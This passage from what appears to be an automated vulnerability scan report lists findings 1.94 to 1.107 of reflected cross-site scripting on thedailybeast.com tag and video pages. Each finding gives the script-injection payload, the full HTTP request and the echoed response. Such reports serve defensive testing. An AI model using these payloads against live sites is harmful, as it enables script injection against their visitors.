Content-Length: 58575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagd790e"><script>alert(1)</script>8236cf48970/gossip+girl/"/>
...[SNIP]...

1.94. http://www.thedailybeast.com/tag/gwyneth+paltrow/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/gwyneth+paltrow/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4fa"><script>alert(1)</script>391a4816353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3b4fa"><script>alert(1)</script>391a4816353/gwyneth+paltrow/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag3b4fa"><script>alert(1)</script>391a4816353/gwyneth+paltrow/"/>
...[SNIP]...

1.95. http://www.thedailybeast.com/tag/jim+carrey/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jim+carrey/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a77fb"><script>alert(1)</script>752196addb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga77fb"><script>alert(1)</script>752196addb8/jim+carrey/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga77fb"><script>alert(1)</script>752196addb8/jim+carrey/"/>
...[SNIP]...

1.96. http://www.thedailybeast.com/tag/jimmy+mcmillan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jimmy+mcmillan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a51"><script>alert(1)</script>d301b22a1d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag72a51"><script>alert(1)</script>d301b22a1d2/jimmy+mcmillan/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag72a51"><script>alert(1)</script>d301b22a1d2/jimmy+mcmillan/"/>
...[SNIP]...

1.97. http://www.thedailybeast.com/tag/jon+hamm/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jon+hamm/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccefe"><script>alert(1)</script>b4603a97595 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagccefe"><script>alert(1)</script>b4603a97595/jon+hamm/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagccefe"><script>alert(1)</script>b4603a97595/jon+hamm/"/>
...[SNIP]...

1.98. http://www.thedailybeast.com/tag/judah+friedlander/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/judah+friedlander/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81368"><script>alert(1)</script>22d3af8d9f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag81368"><script>alert(1)</script>22d3af8d9f8/judah+friedlander/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag81368"><script>alert(1)</script>22d3af8d9f8/judah+friedlander/"/>
...[SNIP]...

1.99. http://www.thedailybeast.com/tag/keith+olbermann/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/keith+olbermann/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb8"><script>alert(1)</script>f671c4114a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag65eb8"><script>alert(1)</script>f671c4114a1/keith+olbermann/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag65eb8"><script>alert(1)</script>f671c4114a1/keith+olbermann/"/>
...[SNIP]...

1.100. http://www.thedailybeast.com/tag/michelle+obama/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/michelle+obama/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6cf"><script>alert(1)</script>31f0e927e36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2c6cf"><script>alert(1)</script>31f0e927e36/michelle+obama/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag2c6cf"><script>alert(1)</script>31f0e927e36/michelle+obama/"/>
...[SNIP]...

1.101. http://www.thedailybeast.com/tag/ok+go/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/ok+go/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a580"><script>alert(1)</script>41a1b2ea052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9a580"><script>alert(1)</script>41a1b2ea052/ok+go/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag9a580"><script>alert(1)</script>41a1b2ea052/ok+go/"/>
...[SNIP]...

1.102. http://www.thedailybeast.com/tag/simpsons/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/simpsons/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa652"><script>alert(1)</script>492cd647d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaa652"><script>alert(1)</script>492cd647d95/simpsons/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagaa652"><script>alert(1)</script>492cd647d95/simpsons/"/>
...[SNIP]...

1.103. http://www.thedailybeast.com/tag/tina+fey/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/tina+fey/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c6d"><script>alert(1)</script>2eed66a7b19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage3c6d"><script>alert(1)</script>2eed66a7b19/tina+fey/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tage3c6d"><script>alert(1)</script>2eed66a7b19/tina+fey/"/>
...[SNIP]...

1.104. http://www.thedailybeast.com/tag/twilight/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/twilight/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b60a9"><script>alert(1)</script>677c069ff60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb60a9"><script>alert(1)</script>677c069ff60/twilight/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagb60a9"><script>alert(1)</script>677c069ff60/twilight/"/>
...[SNIP]...

1.105. http://www.thedailybeast.com/tag/wheel+of+fortune/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/wheel+of+fortune/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1595"><script>alert(1)</script>c71768ff6a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga1595"><script>alert(1)</script>c71768ff6a0/wheel+of+fortune/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga1595"><script>alert(1)</script>c71768ff6a0/wheel+of+fortune/"/>
...[SNIP]...

1.106. http://www.thedailybeast.com/tag/zach+galifianakis/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/zach+galifianakis/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c054"><script>alert(1)</script>9f44b4a24d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3c054"><script>alert(1)</script>9f44b4a24d0/zach+galifianakis/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag3c054"><script>alert(1)</script>9f44b4a24d0/zach+galifianakis/"/>
...[SNIP]...

1.107. http://www.thedailybeast.com/video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84b0"><script>alert(1)</script>2ad767cd6ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videoe84b0"><script>alert(1)</script>2ad767cd6ed/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/videoe84b0"><script>alert(1)</script>2ad767cd6ed/"/>
...[SNIP]...
